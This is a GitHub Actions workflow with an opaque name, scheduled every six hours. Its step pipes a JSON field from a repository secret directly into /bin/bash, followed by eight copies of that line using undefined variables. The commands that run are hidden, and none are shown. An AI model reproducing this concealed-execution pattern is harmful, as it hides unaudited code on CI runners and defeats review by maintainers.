name: jifengcaolu
on:
  workflow_dispatch:
  schedule:
    - cron: '54 1/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: jifengcaolu
        env:
          hk09: ${{ secrets.hk09 }}
        run: |
          echo $hk09 | jq -r .uhd58045 | /bin/bash
          echo $jq9 | jq -r .fpp27 | /bin/bash
          echo $mgvl6 | jq -r .vwqr605 | /bin/bash
          echo $btru071 | jq -r .di43366 | /bin/bash
          echo $dewrb0097 | jq -r .xnbad34 | /bin/bash
          echo $nqof8 | jq -r .ewzbp36770 | /bin/bash
          echo $huza57 | jq -r .pqwt057 | /bin/bash
          echo $d21 | jq -r .obn53 | /bin/bash
          echo $qeeg0 | jq -r .opfbk080 | /bin/bash

